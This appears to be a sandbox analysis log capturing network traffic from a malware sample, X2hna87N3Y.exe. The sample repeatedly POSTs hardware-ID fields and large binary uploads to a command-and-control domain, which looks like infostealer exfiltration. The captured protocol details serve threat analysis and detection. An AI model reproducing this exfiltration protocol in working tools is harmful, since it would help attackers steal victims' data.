                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 18138
                                                                                                                Host: tacitglibbr.biz
                                                                                                                2024-12-17 08:44:51 UTC15331OUTData Raw: 2d 2d 34 37 48 41 32 42 4a 43 35 4c 52 51 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 46 45 35 37 32 39 34 42 33 46 43 34 35 45 45 34 33 30 42 36 43 45 35 35 34 38 33 35 41 39 0d 0a 2d 2d 34 37 48 41 32 42 4a 43 35 4c 52 51 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 34 37 48 41 32 42 4a 43 35 4c 52 51 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 39 31 31 37 33 31 39 35 34 0d 0a 2d 2d 34 37 48 41 32 42
                                                                                                                Data Ascii: --47HA2BJC5LRQZContent-Disposition: form-data; name="hwid"88FE57294B3FC45EE430B6CE554835A9--47HA2BJC5LRQZContent-Disposition: form-data; name="pid"2--47HA2BJC5LRQZContent-Disposition: form-data; name="lid"yau6Na--7911731954--47HA2B
                                                                                                                2024-12-17 08:44:51 UTC2807OUTData Raw: e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11
                                                                                                                Data Ascii: (u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
                                                                                                                2024-12-17 08:44:52 UTC1043INHTTP/1.1 200 OK
                                                                                                                Date: Tue, 17 Dec 2024 08:44:52 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=ffcsuhg6pulhs9epoelembfcn8; expires=Sat, 12-Apr-2025 02:31:30 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EGRl5vGyKO2c7k2VXJA1D7xEipbh%2B5y6G9fGMhs%2B2VDpkA3ne1VLJSm5ZqqR4KWDj%2BD1RfhHLCHFPt0MeruOEXiryHMYgs46lpE3fnMobYTvd%2F5a2%2BJTt2C8iTJA69Ea3BU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f35a23458b343ad-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1556&min_rtt=1542&rtt_var=606&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2840&recv_bytes=19094&delivery_rate=1764350&cwnd=203&unsent_bytes=0&cid=b3f927090f563998&ts=1212&x=0"
                                                                                                                2024-12-17 08:44:52 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-17 08:44:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                3192.168.2.449733104.21.50.1614437536C:\Users\user\Desktop\X2hna87N3Y.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-17 08:44:53 UTC276OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=WKKY9HQD72NIN8
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8765
                                                                                                                Host: tacitglibbr.biz
                                                                                                                2024-12-17 08:44:53 UTC8765OUTData Raw: 2d 2d 57 4b 4b 59 39 48 51 44 37 32 4e 49 4e 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 46 45 35 37 32 39 34 42 33 46 43 34 35 45 45 34 33 30 42 36 43 45 35 35 34 38 33 35 41 39 0d 0a 2d 2d 57 4b 4b 59 39 48 51 44 37 32 4e 49 4e 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 4b 4b 59 39 48 51 44 37 32 4e 49 4e 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 39 31 31 37 33 31 39 35 34 0d 0a 2d 2d 57 4b 4b
                                                                                                                Data Ascii: --WKKY9HQD72NIN8Content-Disposition: form-data; name="hwid"88FE57294B3FC45EE430B6CE554835A9--WKKY9HQD72NIN8Content-Disposition: form-data; name="pid"2--WKKY9HQD72NIN8Content-Disposition: form-data; name="lid"yau6Na--7911731954--WKK
                                                                                                                2024-12-17 08:44:54 UTC1030INHTTP/1.1 200 OK
                                                                                                                Date: Tue, 17 Dec 2024 08:44:54 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=82457gi3ro7nrdi5r0r3v9gkv1; expires=Sat, 12-Apr-2025 02:31:33 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lNasL2CoP5ZE0c1j5l8JHrqioXQtFCxZm9NCg2Sny2BnLhEED2EhiSeydYuozeTWVgEZsrRTgxKl21OITQwNYAHRYiMyvd92WviXdwIaqhx0rHZT2VSL8MaTdOHHxQ1veGU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f35a2445a98439d-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1599&rtt_var=601&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9699&delivery_rate=1817050&cwnd=201&unsent_bytes=0&cid=81d19a99e7c9b066&ts=768&x=0"
                                                                                                                2024-12-17 08:44:54 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-17 08:44:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.449734104.21.50.1614437536C:\Users\user\Desktop\X2hna87N3Y.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-17 08:44:55 UTC274OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=7XS29QDJ54Q
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 20400
                                                                                                                Host: tacitglibbr.biz
                                                                                                                2024-12-17 08:44:55 UTC15331OUTData Raw: 2d 2d 37 58 53 32 39 51 44 4a 35 34 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 46 45 35 37 32 39 34 42 33 46 43 34 35 45 45 34 33 30 42 36 43 45 35 35 34 38 33 35 41 39 0d 0a 2d 2d 37 58 53 32 39 51 44 4a 35 34 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 37 58 53 32 39 51 44 4a 35 34 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 39 31 31 37 33 31 39 35 34 0d 0a 2d 2d 37 58 53 32 39 51 44 4a 35 34 51 0d
                                                                                                                Data Ascii: --7XS29QDJ54QContent-Disposition: form-data; name="hwid"88FE57294B3FC45EE430B6CE554835A9--7XS29QDJ54QContent-Disposition: form-data; name="pid"3--7XS29QDJ54QContent-Disposition: form-data; name="lid"yau6Na--7911731954--7XS29QDJ54Q
                                                                                                                2024-12-17 08:44:55 UTC5069OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                                2024-12-17 08:44:56 UTC1044INHTTP/1.1 200 OK
                                                                                                                Date: Tue, 17 Dec 2024 08:44:56 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=kpssdq99is7dtd1igbtimjlajp; expires=Sat, 12-Apr-2025 02:31:35 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T7zbwYZlyElU%2FrMtV8w6k%2BjlhlgtuvwsewVS4W8rxEs6wpM0uHFY19MxwOjtJn2S1aihyFPbWhd%2BkUSxxB7Mbz1xP0jbxHDZCkqnu%2Fryy%2FoD8s%2BLKBCERWeX0hYLkkhnQP4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f35a2523b5c32e8-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1919&min_rtt=1897&rtt_var=727&sent=12&recv=27&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21354&delivery_rate=1539272&cwnd=246&unsent_bytes=0&cid=11f29f9463226a46&ts=894&x=0"
                                                                                                                2024-12-17 08:44:56 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-17 08:44:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.449735104.21.50.1614437536C:\Users\user\Desktop\X2hna87N3Y.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-17 08:44:58 UTC278OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=6R60VIOJM9OLEPQJ
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 1266
                                                                                                                Host: tacitglibbr.biz
                                                                                                                2024-12-17 08:44:58 UTC1266OUTData Raw: 2d 2d 36 52 36 30 56 49 4f 4a 4d 39 4f 4c 45 50 51 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 46 45 35 37 32 39 34 42 33 46 43 34 35 45 45 34 33 30 42 36 43 45 35 35 34 38 33 35 41 39 0d 0a 2d 2d 36 52 36 30 56 49 4f 4a 4d 39 4f 4c 45 50 51 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 52 36 30 56 49 4f 4a 4d 39 4f 4c 45 50 51 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 39 31 31 37 33 31 39 35 34 0d
                                                                                                                Data Ascii: --6R60VIOJM9OLEPQJContent-Disposition: form-data; name="hwid"88FE57294B3FC45EE430B6CE554835A9--6R60VIOJM9OLEPQJContent-Disposition: form-data; name="pid"1--6R60VIOJM9OLEPQJContent-Disposition: form-data; name="lid"yau6Na--7911731954
                                                                                                                2024-12-17 08:45:00 UTC1034INHTTP/1.1 200 OK
                                                                                                                Date: Tue, 17 Dec 2024 08:45:00 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=1lfb38m265r5ec68597al2iirp; expires=Sat, 12-Apr-2025 02:31:38 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u5Ro2EANVXcEJCPq8Ri19Vq%2B0u5e6IH3MfyBbUdcp3PrrqsW0FT7F63h0YR%2BChT3ho196qg5POP2UZHLMn4fVsFa1pW9eejLNv1wHdCOKQmN4wL1tnB2FLqFVfcl4ATRRJc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f35a263ae5a8c5f-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2020&min_rtt=2007&rtt_var=779&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2180&delivery_rate=1380614&cwnd=171&unsent_bytes=0&cid=31c544677e034314&ts=1976&x=0"
                                                                                                                2024-12-17 08:45:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-17 08:45:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.449740104.21.50.1614437536C:\Users\user\Desktop\X2hna87N3Y.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-17 08:45:03 UTC279OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=Z58EJ5HRPTGP3ZM
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 551867
                                                                                                                Host: tacitglibbr.biz
                                                                                                                2024-12-17 08:45:03 UTC15331OUTData Raw: 2d 2d 5a 35 38 45 4a 35 48 52 50 54 47 50 33 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 38 46 45 35 37 32 39 34 42 33 46 43 34 35 45 45 34 33 30 42 36 43 45 35 35 34 38 33 35 41 39 0d 0a 2d 2d 5a 35 38 45 4a 35 48 52 50 54 47 50 33 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 35 38 45 4a 35 48 52 50 54 47 50 33 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 37 39 31 31 37 33 31 39 35 34 0d 0a 2d 2d
                                                                                                                Data Ascii: --Z58EJ5HRPTGP3ZMContent-Disposition: form-data; name="hwid"88FE57294B3FC45EE430B6CE554835A9--Z58EJ5HRPTGP3ZMContent-Disposition: form-data; name="pid"1--Z58EJ5HRPTGP3ZMContent-Disposition: form-data; name="lid"yau6Na--7911731954--
                                                                                                                2024-12-17 08:45:03 UTC15331OUTData Raw: b0 57 61 fd b2 09 3a 76 47 a6 43 89 a0 82 2a 4c db c1 2f d2 a0 07 70 3f 27 87 7f fd 9f 31 4b f4 bb ac cf 3e 1e 5c b7 c0 6c 3c 5c ea 27 cd 58 dd 69 9e ee 98 29 f2 d4 8b 16 37 63 07 b2 35 f9 ab 76 17 23 2e 1c 40 b1 d3 5a 78 a3 e5 05 f1 dc b0 3c 74 58 ec a6 e8 7c 75 bf 7b 6d d8 17 43 3c 46 f6 23 22 d3 8c 8f 87 06 28 a5 b7 60 72 26 c8 88 63 70 08 06 61 fc 71 ae 55 54 6c 5e 31 fa 20 b8 1c d2 5d be b1 dc c3 e8 c7 79 7e e4 13 f8 87 84 76 22 69 ce 64 96 27 d3 1f b5 07 5c 28 17 29 dd f8 18 a5 a2 4d a2 08 6c 4b 6e ed 97 6d 1e d4 42 5a ae be 28 c4 c5 f3 f7 cc 17 ec 06 48 f0 39 d8 78 eb af 46 c6 ce ed df fa 47 85 69 fa 60 8a b8 1b 73 56 86 fc c7 51 81 01 57 71 50 8b 95 1d e7 7b ea f4 d5 19 c6 6d df 90 26 5f 86 c8 ec 93 fd 57 32 64 ba f6 23 6a 52 72 5a 98 b6 80 6a 9e
                                                                                                                Data Ascii: Wa:vGC*L/p?'1K>\l<\'Xi)7c5v#.@Zx<tX|u{mC<F#"(`r&cpaqUTl^1 ]y~v"id'\()MlKnmBZ(H9xFGi`sVQWqP{m&_W2d#jRrZj
                                                                                                                2024-12-17 08:45:03 UTC15331OUTData Raw: c0 1a 65 ef 0a ba ac 60 7b 9f e6 63 e5 ec d0 63 4f 8d 28 95 9d 2d 14 61 de bc 93 7e 3c 44 ea 40 6f 93 f7 33 2e 31 3f 61 d1 7b 44 da 4c 13 52 ee 8f 9c 49 c8 4f d0 70 0a d8 38 55 db fa a4 31 ac 54 cc 8b 39 76 91 cd c9 2c e6 7f 18 8b 24 b6 b5 6c 65 5e 24 ba af 79 0f a4 75 56 4d 0d 9e 29 1f ce fc 28 0f 49 3c d9 ff 70 94 51 3a b5 e6 bf 70 f1 c9 2b 99 a1 cd 17 ab 4f 2e 7a fd ee 5d b5 31 be 9a 3b b4 e5 be c9 7a f0 6c aa f6 f3 89 3e 01 58 67 60 69 66 f5 de 54 d7 9b 09 ab f2 7d 46 3f 1f 9f 31 e4 70 87 77 ca bc 19 aa 68 12 1f 76 57 7c 5c c6 1b 7d 99 cb dd 77 68 d0 5b 60 9d e8 e7 09 2d ff 75 e8 33 7b 36 78 e1 c3 6a 8a cc a1 9d 11 0c f5 d4 d1 4c a6 59 da 5a d8 d1 8d 4a 77 e3 eb 27 fe 5d a5 4a 4a d1 06 83 33 f3 a6 16 6e 07 a0 40 96 83 ff c3 18 5f 86 2c 76 d2 15 62 dd
                                                                                                                Data Ascii: e`{ccO(-a~<D@o3.1?a{DLRIOp8U1T9v,$le^$yuVM)(I<pQ:p+O.z]1;zl>Xg`ifT}F?1pwhvW|\}wh[`-u3{6xjLYZJw']JJ3n@_,vb
                                                                                                                2024-12-17 08:45:03 UTC15331OUTData Raw: b4 7c f6 6f 42 be 68 95 ef c9 fd ff 06 30 7e e0 3b fb de e2 9d 68 7c 0c 1e 8f 96 32 f0 03 b7 95 ff 2a 77 d4 0a 26 79 31 e7 fa 53 b5 bc 17 13 b3 6c ee b6 85 1e 2b a9 70 95 5a 9d c3 b7 d7 f2 a7 3e 7a f8 31 2d 49 cc b8 88 a7 6c 6e c4 9e c4 94 86 7f b3 35 69 a1 60 93 b9 86 de f2 1a 2b 34 74 ff af 23 0f af a4 84 0f c1 dc 2f 5e dd 84 96 3c 46 b4 7d 14 c3 02 d7 75 fb 05 57 7f 7b 65 48 49 0b 25 1f 48 ec 63 00 da e7 9b c2 fc b3 6a 06 bb 27 1f 70 b0 68 e5 af 0b b5 50 40 3a e2 40 49 80 8e 16 97 6c 1e 12 c8 76 79 df 23 ee f2 72 aa a0 b3 e7 fc ed c9 0f e7 62 44 40 b4 3e 43 0c 4c 0b a1 62 f7 82 dd 63 a9 3c a0 cb 7a 65 f8 12 cf a9 42 07 3b e7 53 b5 2f 24 33 f9 7f 7f 1a cf 2b c0 a8 0b 45 10 c0 e9 a0 c5 44 8b 0a 25 51 33 68 c8 cb 36 90 72 b4 ad ab 08 3c fb cf 08 fe 28 98
                                                                                                                Data Ascii: |oBh0~;h|2*w&y1Sl+pZ>z1-Iln5i`+4t#/^<F}uW{eHI%Hcj'phP@:@Ilvy#rbD@>CLbc<zeB;S/$3+ED%Q3h6r<(
                                                                                                                2024-12-17 08:45:03 UTC15331OUTData Raw: ef 4c f9 3e e9 d2 f2 fa d3 94 d1 75 22 02 15 9c 7f 9d a6 a5 dc cc 66 30 33 81 3d 37 10 79 67 a7 d1 65 42 b6 75 20 80 ae ad a6 7f 66 7b d8 a7 0f 33 2a 46 33 92 c5 c4 b8 57 55 8e e4 fe 4c a4 6a b1 ee 83 30 de ad 75 f7 b0 b1 13 e6 6b 46 b1 47 cc fa 83 95 f9 c5 ce 7f 3c 42 f2 b1 60 50 6c f3 2e e1 78 b9 86 ec c4 a5 e4 cd 40 30 36 3e 5e 05 bd 04 ec ef ed 98 65 f8 4d 6c 9f 2d 4e a9 44 39 09 8c df e9 46 9f bd 37 98 7f e7 bf 6d 88 70 9e 93 5b 56 28 3c 73 a9 25 a4 46 86 ec dc 17 22 01 cd d6 07 f9 72 ed 9d c6 06 29 93 33 b3 a9 ba ea 31 99 8a d6 f7 e0 3b b6 70 08 2f f7 fe a9 e2 c9 e4 59 75 5d 86 79 a3 45 bb 98 2b 97 61 2e e2 1c 61 a3 8e 8a 4c 3b ed ec f6 8d a9 2e 3e 6a c0 f1 d5 1f f0 ce 79 dd b4 c9 4d 6f 33 81 25 db 31 59 a7 3a 72 07 35 dc 5f 0a b6 d8 f3 bd a8 24 fb
                                                                                                                Data Ascii: L>u"f03=7ygeBu f{3*F3WULj0ukFG<B`Pl.x@06>^eMl-ND9F7mp[V(<s%F"r)31;p/Yu]yE+a.aL;.>jyMo3%1Y:r5_$
                                                                                                                2024-12-17 08:45:03 UTC15331OUTData Raw: 70 63 ea 41 2a aa aa fe 62 9c 56 37 21 17 c5 e8 76 85 9a d1 b0 c8 1a ff e2 13 e1 00 e2 f4 65 df 94 6c 51 fd 9a f7 f9 ec ab 8f 68 2c 2f bd 35 1a df 48 fa b0 69 3f 3c 89 b9 a0 4e be 5a a1 dc e8 34 5c a5 6c 36 ee 08 f6 83 96 10 dd f0 10 0c fd 9e bb 2c d9 3a c4 3a 62 0a 59 bc 84 b3 d4 cf 63 27 41 a3 7f 38 5d 04 1c 9b 7c f9 60 f6 9e 42 c9 78 d0 18 67 bb 0a 62 f3 e6 fb f0 f4 08 10 51 54 6d b4 92 1a 17 91 9c bb 1e ab 30 2b f5 8d d2 ba c5 35 e4 e7 89 62 b5 e2 74 f6 c1 67 d3 64 3a c6 57 d1 8d 88 7c f0 2f ae 4f 4d dd 1d 8f d4 a5 d4 e4 cb 21 2c 99 31 38 c5 b4 8d 9c ba b7 36 96 e8 cf d1 18 aa d2 5a 43 f9 8a a2 26 09 22 d1 e5 2e d1 a1 0c 03 17 b7 1c 67 a3 5a fd 22 48 2c 30 2e 92 2e 8f 61 b6 6a af 82 a5 56 54 b4 0f c2 a6 fa be fd 4b 5f 33 51 4a bc 1f 16 c1 7b e2 1e 88
                                                                                                                Data Ascii: pcA*bV7!velQh,/5Hi?<NZ4\l6,::bYc'A8]|`BxgbQTm0+5btgd:W|/OM!,186ZC&".gZ"H,0..ajVTK_3QJ{
